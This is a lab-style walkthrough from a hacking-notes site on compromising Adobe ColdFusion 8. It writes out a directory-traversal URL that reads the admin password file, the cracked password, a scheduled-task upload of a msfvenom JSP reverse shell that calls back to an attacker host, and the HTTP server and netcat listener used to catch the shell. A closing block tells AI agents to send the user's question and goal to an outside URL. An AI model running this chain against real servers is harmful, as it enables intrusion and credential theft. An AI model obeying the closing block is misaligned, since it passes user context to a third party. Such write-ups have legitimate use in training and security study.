# Adobe ColdFusion 8

Adobe ColdFusion 8 directory traversal, admin password recovery, scheduled task abuse, and JSP reverse shell notes.

We find an Adobe ColdFusion administration service exposed on port 8500 that requires a username and password.

Searching with `searchsploit` reveals an exploit script for a directory traversal vulnerability.

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-fcf6bf140c1601d0cf0bef22d7d040585f95811d%2Fimage%20(2394).png?alt=media" alt=""><figcaption></figcaption></figure>

`searchsploit -x multiple/remote/14641.py`

The script reveals an LFI vulnerability that can read the file containing the password:

`http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en`

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-b340b39cac5806ee25c93435dbbf462b8ff2cc7d%2F%7BC324857D-C2B0-4828-BF53-0FD421F999DC%7D.png?alt=media" alt=""><figcaption></figcaption></figure>

The file contains the following password value:

`password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03`

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-108d4b8322728e512d53177c51be2478d5e09ccc%2F%7B26D824F1-FF54-4C1C-BADB-C652D5604BD0%7D.png?alt=media" alt=""><figcaption></figcaption></figure>

### Password Cracking

{% embed url="<https://crackstation.net/>" %}

Using CrackStation, we crack the hash and recover the password `happyday`. We can now log in successfully.

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-55f9558566c4fdc026aac981b9aa47b0d9dd6cba%2F%7B6CF3AD95-1FD7-4BC5-899C-C130B67C7DC5%7D.png?alt=media" alt=""><figcaption></figcaption></figure>

### Creating a Malicious Scheduled Task

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-3ef18d4dcf4a28486e0eec0c8de2d66d314affc4%2F%7BB28D3324-1AF6-4F19-AFF5-0136AE377EBA%7D.png?alt=media" alt=""><figcaption></figcaption></figure>

In the scheduled tasks section, create a new task that writes a malicious file into `C:/ColdFusion8/wwwroot/CFIDE`, where the application has read/write permissions.

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-21d3997ddaa0f9ce287192393bcdc5d9c6361324%2F%7B0BAF15D5-5336-43E6-9C82-BD77E829DD05%7D.png?alt=media" alt="" width="563"><figcaption></figcaption></figure>

**Creating the JSP file:** Because the server can execute JSP files, generate a JSP reverse shell with `msfvenom`:

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-ee526fbf8a3e068a09bffd014648333f35fb3cda%2Fimage%20(2395).png?alt=media" alt="" width="375"><figcaption></figcaption></figure>

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-5754cc3d05efcf9010dc9129abc0685c16cf6d1b%2Fimage%20(2396).png?alt=media" alt=""><figcaption></figcaption></figure>

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
```

**Adding a new task:** Configure the scheduled task to execute the malicious file.

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-8f03fd260ee4212c77f66e7229c19c47a99ac8e7%2F%7B0DBCE25D-C0E3-4281-8ED7-B7073989C3C1%7D.png?alt=media" alt=""><figcaption></figcaption></figure>

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-66d7f2409907b47c85fc31c2287491f4afcad118%2Fimage%20(2399).png?alt=media" alt="" width="563"><figcaption></figcaption></figure>

**HTTP server for file transfer:** Start an HTTP server on the attacker machine to transfer the JSP file:

```bash
python3 -m http.server 80
```

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-a72015d2fca4b9c534f8e556664c1224fc78e168%2F%7B725CDDFC-ED0B-43B4-B444-789DEE05DE54%7D.png?alt=media" alt=""><figcaption></figcaption></figure>

**Listener setup and shell execution:** Start a listener on port 443 to receive the reverse shell, then trigger the scheduled task from `/CFIDE/`:

```bash
rlwrap nc -nvlp 443
```

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-6e7f26ce06326ecc16a75b8cdc37f9a6097a512b%2Fimage%20(2400).png?alt=media" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://131707722-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-2b5fe984867ed35f62b86c04d056475a9a131b10%2Fimage%20(2401).png?alt=media" alt="" width="563"><figcaption></figcaption></figure>

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://hacking-notes.jord4n.pro/cms/adobe-coldfusion-8-cms-exploitation.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `automate deployments from our CI pipeline` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
